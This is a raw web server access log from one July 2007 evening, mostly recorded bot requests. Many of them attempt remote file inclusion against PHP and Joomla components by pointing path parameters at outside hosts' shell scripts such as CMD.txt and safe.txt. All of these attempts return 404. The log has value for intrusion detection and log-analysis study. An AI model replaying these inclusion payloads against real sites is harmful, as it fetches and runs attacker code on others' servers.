65.90.251.179 - - [29/Jul/2007:20:56:31 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
65.90.251.179 - - [29/Jul/2007:20:56:32 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
74.6.72.243 - - [29/Jul/2007:21:08:03 -0700] "GET /logs/?S=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
212.241.193.143 - - [29/Jul/2007:21:11:15 -0700] "GET /logs/access_070716.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://uny.ac.id/~bambang/wp-content/plugins/akismet/_log/logs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.51.41.84 - - [29/Jul/2007:21:13:47 -0700] "GET /logs/inc/step_one_tables.php?server_inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.51.41.84 - - [29/Jul/2007:21:13:47 -0700] "GET /inc/step_one_tables.php?server_inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
190.54.62.68 - - [29/Jul/2007:21:14:56 -0700] "GET /logs/index.php?p=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
190.54.62.68 - - [29/Jul/2007:21:14:57 -0700] "GET /index.php?p=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
221.121.107.7 - - [29/Jul/2007:21:16:43 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
221.121.107.7 - - [29/Jul/2007:21:16:44 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
190.54.62.68 - - [29/Jul/2007:21:18:58 -0700] "GET /logs/index.php?file=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
190.54.62.68 - - [29/Jul/2007:21:18:59 -0700] "GET /index.php?file=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.121.20.108 - - [29/Jul/2007:21:21:16 -0700] "GET /logs/access_070212.log HTTP/1.1" 200 881097 "http://search.live.com/results.aspx?FORM=DNSAS&q=200.106.100.82" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322)" "www.galf.org"
74.6.23.232 - - [29/Jul/2007:21:25:50 -0700] "GET /cendoc/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.254.222.159 - - [29/Jul/2007:21:28:26 -0700] "GET /logs/index.php?go=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.254.222.159 - - [29/Jul/2007:21:28:28 -0700] "GET /index.php?go=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.91.201.60 - - [29/Jul/2007:21:29:17 -0700] "GET /logs/access_070716.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://uny.ac.id/~bambang/wp-content/plugins/akismet/_log/logs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.19.215 - - [29/Jul/2007:21:31:01 -0700] "GET /logs/access_061211.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
217.212.224.145 - - [29/Jul/2007:21:32:56 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.galf.org"
217.212.224.141 - - [29/Jul/2007:21:32:57 -0700] "GET /logs/?S=A HTTP/1.0" 200 4926 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.galf.org"
217.212.224.159 - - [29/Jul/2007:21:34:20 -0700] "GET /logs/?M=A HTTP/1.0" 200 4926 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.galf.org"
217.212.224.141 - - [29/Jul/2007:21:35:46 -0700] "GET /logs/?N=D HTTP/1.0" 200 4926 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.galf.org"
217.212.224.144 - - [29/Jul/2007:21:46:36 -0700] "GET /logs/?M=D HTTP/1.0" 200 4926 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.galf.org"
66.249.73.202 - - [29/Jul/2007:21:47:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
66.249.73.202 - - [29/Jul/2007:21:47:54 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.7.200.148 - - [29/Jul/2007:21:51:44 -0700] "GET /logs/main.php?id=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.7.200.148 - - [29/Jul/2007:21:51:45 -0700] "GET /main.php?id=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.249.73.202 - - [29/Jul/2007:21:51:55 -0700] "GET /logs/ HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
66.7.200.148 - - [29/Jul/2007:21:52:56 -0700] "GET /logs/access_070716.log/main.php?id=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
66.7.200.148 - - [29/Jul/2007:21:52:57 -0700] "GET /main.php?id=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
66.7.200.148 - - [29/Jul/2007:21:52:57 -0700] "GET /logs/main.php?id=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
74.53.78.226 - - [29/Jul/2007:21:53:19 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.garotym123.kit.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.78.226 - - [29/Jul/2007:21:53:19 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.garotym123.kit.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
195.10.195.217 - - [29/Jul/2007:21:54:13 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.10.195.217 - - [29/Jul/2007:21:54:14 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
195.10.195.217 - - [29/Jul/2007:21:54:14 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.249.73.202 - - [29/Jul/2007:21:55:37 -0700] "GET /logs/access.log HTTP/1.1" 200 56744 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.116.12.106 - - [29/Jul/2007:21:58:01 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.116.12.106 - - [29/Jul/2007:21:58:02 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.7.200.148 - - [29/Jul/2007:21:58:45 -0700] "GET /logs/access.log/main.php?id=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
74.6.23.157 - - [29/Jul/2007:21:59:05 -0700] "GET /logs/access_070212.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.78.226 - - [29/Jul/2007:22:03:17 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.garotym123.kit.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.78.226 - - [29/Jul/2007:22:03:17 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.garotym123.kit.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.6 - - [29/Jul/2007:22:07:52 -0700] "GET /logs/!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
58.126.183.6 - - [29/Jul/2007:22:07:57 -0700] "GET /!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.19.16.50 - - [29/Jul/2007:22:08:20 -0700] "GET /logs//osticket//include/main.php?config[search_disp]=true&include_dir=http://www.kendera.com.br/morgan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
67.19.16.50 - - [29/Jul/2007:22:08:20 -0700] "GET //osticket//include/main.php?config[search_disp]=true&include_dir=http://www.kendera.com.br/morgan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:22:09:34 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:22:09:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.16.50 - - [29/Jul/2007:22:10:25 -0700] "GET /logs/access_070716.log//osticket//include/main.php?config[search_disp]=true&include_dir=http://www.kendera.com.br/morgan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
67.19.16.50 - - [29/Jul/2007:22:10:25 -0700] "GET //osticket//include/main.php?config[search_disp]=true&include_dir=http://www.kendera.com.br/morgan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
67.19.16.50 - - [29/Jul/2007:22:10:26 -0700] "GET /logs//osticket//include/main.php?config[search_disp]=true&include_dir=http://www.kendera.com.br/morgan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:22:12:00 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:22:12:00 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.16.50 - - [29/Jul/2007:22:12:29 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kendera.com.br/morgan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
67.19.16.50 - - [29/Jul/2007:22:12:29 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kendera.com.br/morgan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
67.19.16.50 - - [29/Jul/2007:22:12:29 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kendera.com.br/morgan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
67.19.16.50 - - [29/Jul/2007:22:13:18 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kendera.com.br/morgan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
67.19.16.50 - - [29/Jul/2007:22:13:18 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kendera.com.br/morgan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:22:14:50 -0700] "GET /logs/index2.php?x=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:22:14:50 -0700] "GET /index2.php?x=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.70.185 - - [29/Jul/2007:22:15:35 -0700] "GET /logs/?N=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.230.1.146 - - [29/Jul/2007:22:17:33 -0700] "GET /logs/index.php?pag=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.1.146 - - [29/Jul/2007:22:17:33 -0700] "GET /index.php?pag=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.241.208.65 - - [29/Jul/2007:22:21:52 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.208.65 - - [29/Jul/2007:22:21:53 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.29.74.3 - - [29/Jul/2007:22:23:16 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://mcz.mambodrom.cz/components/baliem? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
195.10.195.217 - - [29/Jul/2007:22:24:37 -0700] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.10.195.217 - - [29/Jul/2007:22:24:37 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.10.195.217 - - [29/Jul/2007:22:24:38 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.74.3 - - [29/Jul/2007:22:25:57 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://mcz.mambodrom.cz/components/baliem? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
130.94.224.247 - - [29/Jul/2007:22:25:58 -0700] "GET /logs/index2.php?x=http://www.corkingwines.com/templates/canboy? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
130.94.224.247 - - [29/Jul/2007:22:25:58 -0700] "GET /index2.php?x=http://www.corkingwines.com/templates/canboy? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
74.6.25.38 - - [29/Jul/2007:22:27:27 -0700] "GET /logs/access_070205.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:22:27:38 -0700] "GET /logs/access.log/index2.php?x=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:22:27:39 -0700] "GET /logs/access_070716.log/index2.php?x=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [29/Jul/2007:22:31:02 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [29/Jul/2007:22:31:02 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
60.50.170.33 - - [29/Jul/2007:22:33:57 -0700] "GET /logs/access_070115.log HTTP/1.1" 200 655360 "http://search.yahoo.com/search?p=http%3A%2F219.93.220.202%2F&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8&vc=&fp_ip=MY" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
211.78.3.229 - - [29/Jul/2007:22:34:10 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.it-kompass.net/templates/JavaBean/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
130.94.224.247 - - [29/Jul/2007:22:36:05 -0700] "GET /logs/access.log/index2.php?x=http://www.corkingwines.com/templates/canboy? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
64.26.63.21 - - [29/Jul/2007:22:37:01 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.26.63.21 - - [29/Jul/2007:22:37:01 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.1.146 - - [29/Jul/2007:22:37:45 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.1.146 - - [29/Jul/2007:22:37:45 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.1.146 - - [29/Jul/2007:22:37:51 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.1.146 - - [29/Jul/2007:22:37:52 -0700] "GET /modules/My_eGallery/index.php?basepath=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.170.43.179 - - [29/Jul/2007:22:40:58 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.170.43.179 - - [29/Jul/2007:22:41:02 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
4.79.181.231 - - [29/Jul/2007:22:42:22 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.iwc.edu/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.15.74.10 - - [29/Jul/2007:22:45:19 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.15.74.10 - - [29/Jul/2007:22:45:19 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.1.146 - - [29/Jul/2007:22:45:59 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.1.146 - - [29/Jul/2007:22:46:00 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
87.230.1.146 - - [29/Jul/2007:22:46:00 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.1.146 - - [29/Jul/2007:22:46:05 -0700] "GET /logs/access_070716.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
72.22.90.110 - - [29/Jul/2007:22:47:48 -0700] "GET /logs/index.php?include=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.22.90.110 - - [29/Jul/2007:22:47:48 -0700] "GET /index.php?include=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.122.224 - - [29/Jul/2007:22:48:22 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [29/Jul/2007:22:48:22 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
130.94.224.247 - - [29/Jul/2007:22:49:00 -0700] "GET /logs/access_070716.log/index2.php?x=http://www.corkingwines.com/templates/canboy? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
81.169.178.78 - - [29/Jul/2007:22:52:35 -0700] "GET //sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://scupank.net/scan/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
67.28.112.79 - - [29/Jul/2007:22:54:14 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.northforkclearlake.com/999/9999? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.170.43.179 - - [29/Jul/2007:22:56:13 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.170.43.179 - - [29/Jul/2007:22:56:15 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.145.200 - - [29/Jul/2007:22:58:49 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.galf.org"
64.34.145.200 - - [29/Jul/2007:22:58:49 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.galf.org"
87.230.1.146 - - [29/Jul/2007:23:06:29 -0700] "GET /logs/index.php?open=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.1.146 - - [29/Jul/2007:23:06:29 -0700] "GET /index.php?open=http://juhu.cba.pl/z/z/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.169.178.78 - - [29/Jul/2007:23:08:01 -0700] "GET /logs//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://nomercycod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.178.78 - - [29/Jul/2007:23:08:01 -0700] "GET //sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://nomercycod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
81.169.178.78 - - [29/Jul/2007:23:08:16 -0700] "GET /logs//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://h1.ripway.com/agi/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.178.78 - - [29/Jul/2007:23:08:16 -0700] "GET //sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://h1.ripway.com/agi/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
66.170.43.179 - - [29/Jul/2007:23:10:29 -0700] "GET /logs/index.php?go=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.170.43.179 - - [29/Jul/2007:23:10:41 -0700] "GET /index.php?go=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.106.79.20 - - [29/Jul/2007:23:12:46 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [29/Jul/2007:23:12:46 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.24.226 - - [29/Jul/2007:23:13:19 -0700] "GET /logs/ HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.193.232.6 - - [29/Jul/2007:23:13:43 -0700] "GET /logs/index.php?pagina=http://vivopromote.gratishost.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [29/Jul/2007:23:13:44 -0700] "GET /index.php?pagina=http://vivopromote.gratishost.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.24.38 - - [29/Jul/2007:23:14:31 -0700] "GET /logs/access_070730.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.170.43.179 - - [29/Jul/2007:23:14:43 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.170.43.179 - - [29/Jul/2007:23:14:47 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
74.6.18.44 - - [29/Jul/2007:23:15:19 -0700] "GET /logs/access.log HTTP/1.0" 200 74628 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.19.235 - - [29/Jul/2007:23:16:18 -0700] "GET /?N=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.193.232.6 - - [29/Jul/2007:23:17:01 -0700] "GET /logs/index.php?pag=http://vivopromote.gratishost.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [29/Jul/2007:23:17:01 -0700] "GET /index.php?pag=http://vivopromote.gratishost.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
